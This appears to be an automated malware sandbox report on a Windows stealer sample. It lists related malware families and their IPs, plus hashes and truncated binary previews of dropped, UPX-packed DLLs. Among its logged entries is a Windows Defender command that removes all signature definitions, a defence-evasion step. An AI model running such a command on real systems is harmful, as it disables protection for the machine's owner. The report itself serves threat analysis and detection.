                                                                                                                                                                                                                          https://github.com/Matty77o/malware-samples-m-h/blob/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.159.135.232
                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRATBrowse
                                                                                                                                                                                                                          • 162.159.128.233
                                                                                                                                                                                                                          file.exeGet hashmaliciousAmadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, VenomRAT, VidarBrowse
                                                                                                                                                                                                                          • 162.159.128.233
                                                                                                                                                                                                                          file.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                                                          • 162.159.136.232
                                                                                                                                                                                                                          xooSsYaHN0.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                                                                                                                                                                          • 162.159.128.233
                                                                                                                                                                                                                          IErMYVWrv9.exeGet hashmaliciousPython Stealer, Luna Grabber, Luna LoggerBrowse
                                                                                                                                                                                                                          • 162.159.135.232
                                                                                                                                                                                                                          ip-api.comWE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          ozAxx9uGHu.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          eCXXUk54sx.exeGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          bigfa.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          apDMcnqqWs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          e8YDxjwJiT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          TlNDyT2f5c.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exeGet hashmaliciousPoisonivyBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          CLOUDFLARENETUSmain.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 104.20.4.235
                                                                                                                                                                                                                          in.exeGet hashmaliciousBabadeda, HTMLPhisherBrowse
                                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                                          CVmkXJ7e0a.exeGet hashmaliciousSheetRatBrowse
                                                                                                                                                                                                                          • 104.16.185.241
                                                                                                                                                                                                                          naukri-launcher 10.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 172.64.41.3
                                                                                                                                                                                                                          WE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                          • 162.159.137.232
                                                                                                                                                                                                                          ozAxx9uGHu.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                          • 162.159.136.232
                                                                                                                                                                                                                          naukri-launcher 10.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 162.159.61.3
                                                                                                                                                                                                                          eCXXUk54sx.exeGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                          • 162.159.128.233
                                                                                                                                                                                                                          ZS8xEqirxa.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          • 104.21.27.188
                                                                                                                                                                                                                          wV1Mk5PUmi.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                          • 104.21.48.1
                                                                                                                                                                                                                          TUT-ASUSWE8zqotCFj.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          ozAxx9uGHu.exeGet hashmaliciousBlank Grabber, Umbral StealerBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          eCXXUk54sx.exeGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          file.exeGet hashmaliciousDiscord Token Stealer, Millenuim RATBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          bigfa.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          apDMcnqqWs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          e8YDxjwJiT.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          TlNDyT2f5c.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          ORDER-6070Y689_0PF57682456_DECVC789378909740.jsGet hashmaliciousWSHRat, Snake KeyloggerBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          New Order Enquiry.jsGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                                                                          • 208.95.112.1
                                                                                                                                                                                                                          No context
                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\_MEI73722\VCRUNTIME140.dlllz4wnSavmK.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                            WVuXCNNYG0.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                              dipwo1iToJ.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                                Counseling_Services_Overview.docmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                  uOsIQqfgiT.exeGet hashmaliciousCharity, TrojanRansomBrowse
                                                                                                                                                                                                                                    saiya.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                                                                                                                      RuntimeusererVers.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                                                                                                        OBS-Studio-30.2.3-Windows-Installer.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                          BrowserUpdate.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                            file.exeGet hashmaliciousCStealerBrowse
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                                              Entropy (8bit):0.7263306995675713
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH0L:9JZj5MiKNnNhoxuC
                                                                                                                                                                                                                                              MD5:C2CCF6F9A5FE1742F6C6B5B88304440C
                                                                                                                                                                                                                                              SHA1:1C9241471606F83AAA8FB922893CF5976100C991
                                                                                                                                                                                                                                              SHA-256:6C429D8C71ED34AD698E164AB66E68DE253CAE1900C8BADFF941CAB79D2DE5C4
                                                                                                                                                                                                                                              SHA-512:A487348E7362BBC994D6F4BB65027937ED4B02BC1BEAFD8367810E74ECD81A22A215DF59AEC0D6CFF3819BACC1B9C31A94CEA5ADE4A429C218662F9A072CEA75
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:Extensible storage user DataBase, version 0x620, checksum 0x4f6ccd56, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1310720
                                                                                                                                                                                                                                              Entropy (8bit):0.7555312722617732
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:9SB2ESB2SSjlK/svFH03N9Jdt8lYkr3g16xj2UPkLk+kLWyrufTRryrUYc//kbxW:9azaSvGJzYj2UlmOlOL
                                                                                                                                                                                                                                              MD5:CB17CBA73DDE99BD1BC645884247AABA
                                                                                                                                                                                                                                              SHA1:60B3CE164820290F9A843A484C27290501F912A9
                                                                                                                                                                                                                                              SHA-256:F4F35C534AC6EF26F374E4DB846CD5D383496B29FD574D402C7D9B9672C5FCC2
                                                                                                                                                                                                                                              SHA-512:18C1104D576AE06A0A2A8BD32CE22ADF77319582363FB65AD433C82FEAFD93427E0DD615D34B76D4982BE687B6C6F75CCD2ACE93DB1C4EAE394877B60C21E77A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:Ol.V... .......7.......X\...;...{......................0.e......!...{?..%...|..h.g.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... .......9....{...............................................................................................................................................................................................2...{....................................m\.%...|...................d..%...|...........................#......h.g.....................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):16384
                                                                                                                                                                                                                                              Entropy (8bit):0.07798685728132654
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:FllllEYeL53Ejg3NaAPaU1lQiZllllAlluxmO+l/SNxOf:flllEzLpKANDPaUfbl/AgmOH
                                                                                                                                                                                                                                              MD5:106501F78E8B416AFB170049F1721C7D
                                                                                                                                                                                                                                              SHA1:9C3105FD908E9FAB81FDBE5FFFACC4BAAEB4EB36
                                                                                                                                                                                                                                              SHA-256:8A86E2BEBB0378BE0B72A257251E2293548FBFAE5F6E5F946D778212BFF85306
                                                                                                                                                                                                                                              SHA-512:DA1D57E08D607BB192205D0E727DE951B71C47209F9EA88FBAD1071B40CBBE09F2558E1A1E4225311508D73CD9A44E66AD93BD8216C893D6CD872B39A4EE29FF
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:........................................;...{...%...|...!...{?..........!...{?..!...{?..g...!...{?..................d..%...|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):64
                                                                                                                                                                                                                                              Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                              MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                              SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                              SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                              SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:@...e...........................................................
                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):695287
                                                                                                                                                                                                                                              Entropy (8bit):7.926111616696779
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12288:N5ycy8sD5R//nGMNVgnz6XBEP0Byj5JFchAYwbxr3o8YXVA:N5Ry84/xV1Wiy/FFVxLwG
                                                                                                                                                                                                                                              MD5:CB5C9DDEDBF0C0A1635AD4622D615573
                                                                                                                                                                                                                                              SHA1:51B6D11D2BA05D93681E8F24AAB00AFBCC183A0D
                                                                                                                                                                                                                                              SHA-256:3C3877E7DF6EA3E08D52D1A6843E15C7C70D048B7B78F80A4DEB288821B4E9FC
                                                                                                                                                                                                                                              SHA-512:918FDB01991ADB8BE255C218656CD99E545EB342D3C25CC6B076987CE5C306BC3B819C6E28F12E12274099D6867BEBDAD8F7A5B65F3B9F856D0BFF40678BF02D
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.eG......K=k.....nf...=s.7mf..W.MO7....".....!.pB....d.........B.;...A.$@....{.v.N.{\...d....x....,A....9..j.<.g...NN.h..^'?7..I.C..t....G.sB....O...:d....k.....q.t.}..|...}.&.......F.../.t?.......*.....Q.t.L..`...=...L.V...m.c..s.##1.......-Ss......'.._>..D.~....*.~.9...-.>z_5..{g...=....H.G.{p.s.,...-S..5>..sVt.\...z.....YT0...'.O,..zw...w..e.;...].R;.......1So.qf.[k..r[......L...b.......5.>^dL...i.xs.7.2..w..n.:o..Z..[..n...7..z...%.}..(.q...'..Gw.......__-..).(.f*./.f..).X...W.c.C.u.e4....6...7WK.K{.{m..u.d...|n.~....}..........w..^.VS{^Su.....~U.._..to).. .v.>.W.S...!..h.....]..s...}..].[.M......_]-.#...x.nin.+3.].hc....Z.W.7.=.v..i.ni....;]..E..........U..........N..%._.Y.[.n....c~Y..K.._....X..;..wL{....c`...R|.4.P.j.K2.v.4..I{.a...e.<bS.}.K....jj.Kr....~..[_....}X.}.....XK.l..f.4.mZ.Z..o...Z.u.n..S. .<0.|........lv~........S.....
                                                                                                                                                                                                                                              Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                              Size (bytes):894
                                                                                                                                                                                                                                              Entropy (8bit):3.1097528243017067
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:Q58KRBubdpkoPAGdjrN7Khk9+MlWlLehW51IC07Kg:QOaqdmOFdjrcm+kWResLIEg
                                                                                                                                                                                                                                              MD5:EF9F33D6369B24910FEA1DED407918B5
                                                                                                                                                                                                                                              SHA1:ACD366990672B584E9EAB8544E9063EB4E68BE3B
                                                                                                                                                                                                                                              SHA-256:98D16076DCCFB10B88654A40E902246A1E90C9F1229AA1A8B656223389624CD5
                                                                                                                                                                                                                                              SHA-512:0645F8A0ED215A1C4C49F970D9B696B4A2DF108457B35DCD508DDA3D6D394F8B3B09E1290B397B993A54AD3573A5C9CD03C99C1B8385BE4D851BB8994FD0DC76
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.M.p.C.m.d.R.u.n...e.x.e.". . .-.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s. .-.A.l.l..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.3.7.:.3.4.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....S.t.a.r.t.:. .M.p.R.e.m.o.v.e.D.e.f.i.n.i.t.i.o.n.s.(.1.).....M.p.C.m.d.R.u.n.:. .E.n.d. .T.i.m.e.:. .. F.r.i. .. D.e.c. .. 1.3. .. 2.0.2.4. .0.2.:.3.7.:.3.4.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....
                                                                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                              File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4c2, 9 symbols, created Fri Dec 13 09:31:48 2024, 1st section name ".debug$S"
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1384
                                                                                                                                                                                                                                              Entropy (8bit):4.118376320267432
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:HhW9vaVyaHJwK4aQMamNwI+ycuZhNVIakS0dPNnqSid:7VHSKd5m1ulVIa30HqSy
                                                                                                                                                                                                                                              MD5:6EE9201CDDE50C73487F96ECEFAFEDD3
                                                                                                                                                                                                                                              SHA1:28E04BC9E41F884AB3D6D5DACDA6B001A91C0601
                                                                                                                                                                                                                                              SHA-256:21D73E743E1D41F09962F67CE14EC4150AA410E221840397BCB3EF419162AD3E
                                                                                                                                                                                                                                              SHA-512:8C48C21B7142E020AEA20D4CC0E361D65C5352C80730F7CE583CAB714F21CCFBAA29F214B9B85BFDA2503466FC13471BA6B67B5F875CBAB90F8B3A4C0441173E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:L.....[g.............debug$S............................@..B.rsrc$01........X.......h...........@..@.rsrc$02........P...r...............@..@........W....c:\Users\user\AppData\Local\Temp\uses4c50\CSCF61F15A833E5414089F1F2D7C06D86CA.TMP................>[.N..(..w...............7.......C:\Users\user\AppData\Local\Temp\RES226F.tmp.-.<....................a..Microsoft (R) CVTRES...=..cwd.C:\Users\user\AppData\Local\Temp\...........exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...u.s.e.s.4.c.5.0...d.l.l.....(.
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):109392
                                                                                                                                                                                                                                              Entropy (8bit):6.641929675972235
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                                                                                                                                                                                              MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                                                                                                                                                                                              SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                                                                                                                                                                                              SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                                                                                                                                                                                              SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                                                                              • Filename: lz4wnSavmK.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: WVuXCNNYG0.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: dipwo1iToJ.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: Counseling_Services_Overview.docm, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: uOsIQqfgiT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: saiya.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: RuntimeusererVers.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: OBS-Studio-30.2.3-Windows-Installer.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: BrowserUpdate.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):49944
                                                                                                                                                                                                                                              Entropy (8bit):7.78315600372484
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:U/onT0xi3xXtfwYf5CVW3Bd7IGCVwU7SyixL7:U/k538e5CIRlIGCVwUO7
                                                                                                                                                                                                                                              MD5:85C70974FAC8E621ED6E3E9A993FBD6F
                                                                                                                                                                                                                                              SHA1:F83974E64AA57D7D027B815E95EBD7C8E45530F1
                                                                                                                                                                                                                                              SHA-256:610983BBCB8EE27963C17EAD15E69AD76EC78FAC64DEB7345CA90D004034CDD6
                                                                                                                                                                                                                                              SHA-512:142792750E4A5189DBEAA710E3F5B3689D593927EA77DED00EB5CAADA6B88D82A37459770845F1EA7C9F45DA5A6AE70E19BFCF76D9F1A56184C3164B736BCB18
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......w.l.3...3...3...:...9......1......0......>......;......7.......0...x...1...3...l.......;.......2.......2.......2...Rich3...................PE..d...f..e.........." ...#.............e....................................................`.............................................H.................... ..,...................................................q..@...........................................UPX0....................................UPX1................................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):60696
                                                                                                                                                                                                                                              Entropy (8bit):7.822236524949101
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:WbK/YBHE2gCtX+/9zyeoVIkwLMzKep8z+IGLPAt7SyWxU:WGAK2ghtGIk6MeeGyIGLPAtz
                                                                                                                                                                                                                                              MD5:E7EF30080C1785BAF2F9BB8CF5AFE1B2
                                                                                                                                                                                                                                              SHA1:B7D7D0E3B15DE9B1E177B57FD476CECBDD4FCB79
                                                                                                                                                                                                                                              SHA-256:2891382070373D5070CB8FD6676AFC9F5EB4236251F8FC5C0941AF0C53A2D31E
                                                                                                                                                                                                                                              SHA-512:C2EC431D2821879BB505D8ECA13FA3921DB016E00B8674FA62B03F27DC5CEE6DD0DE16BA567D19D4B0AF9A5CB34D544383A68CC63FF2FA9D8BB55E356D0D73E6
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......>...z.z.z.s...|....x....v....r....~.....x.1...{.1...|.....y.z.......|.....{...o.{.....{.Richz.................PE..d...c..e.........." ...#.............-.......................................P............`.........................................HL.......I.......@.......................L.......................................9..@...........................................UPX0....................................UPX1................................@....rsrc........@......................@......................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):108312
                                                                                                                                                                                                                                              Entropy (8bit):7.9301662560961494
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:HnHQe/FKYjTnmuJkv4D5ZIBGeKHC6ajQ6BWIGOqmbtbb9:HnHQe/MYjTnDJRX6Ge16ehbhx
                                                                                                                                                                                                                                              MD5:3923E27B9378DA500039E996222FFEE6
                                                                                                                                                                                                                                              SHA1:A9280559A71ABF390348E1B6A0FB1F2409649189
                                                                                                                                                                                                                                              SHA-256:0275B03041F966E587D1C4C50266C3FDFF1E1A65F652AD07B59CB85845B5457E
                                                                                                                                                                                                                                              SHA-512:051C613403FD80B9582DD48C1F38870CB26846D54B75603EA52A78202A72272107E95750DE78CD8F6C56951EBDE501B4892D90FB306326B86124C8CC97BCA594
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........@.R.!...!...!...Y=..!..+]...!..+]...!..+]...!..+]...!..M\...!...Y...!...!...!..M\...!..M\...!..M\...!..M\Q..!..M\...!..Rich.!..........PE..d...T..e.........." ...#.p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................@...........................................UPX0....................................UPX1.....p.......f..................@....rsrc........ .......j..............@......................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):36120
                                                                                                                                                                                                                                              Entropy (8bit):7.670480771561197
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:6EKW7574DsajR20fnfPHz8HLP8pfbnIGOINg5YiSyvIAMxkE3n1:jKW7hq00fnTQEbnIGOINy7Sy+xzn1
                                                                                                                                                                                                                                              MD5:C8B153F0BE8569CE2C2DE3D55952D9C7
                                                                                                                                                                                                                                              SHA1:0861D6DCD9B28ABB8B69048CAF3C073E94F87FDC
                                                                                                                                                                                                                                              SHA-256:AF9F39D2A5D762214F6DE2C8FEC0A5BC6BE0B8223EF47164CAA4C6E3D6437A58
                                                                                                                                                                                                                                              SHA-512:81CCBFFF0F4CDD1502AF9D73928B940098B9ACC58B19C1A939ECDF17418096294AF4A4529EE7A0BBE1C686E3B0254651E211C1093264D1835065A82711AC0379
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........u...&...&...&.U&...&u..'...&u..'...&u..'...&u..'...&...'...&...'...&...&M..&...'...&...'...&..9&...&...'...&Rich...&........PE..d......e.........." ...#.P.........../.......................................P............`.........................................|K..P....I.......@.......................K.......................................;..@...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@..............................................................................................................................................................................................................................................................................................................................................................4.02.UPX!.$..
                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\wsapx.exe
                                                                                                                                                                                                                                              File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):87832
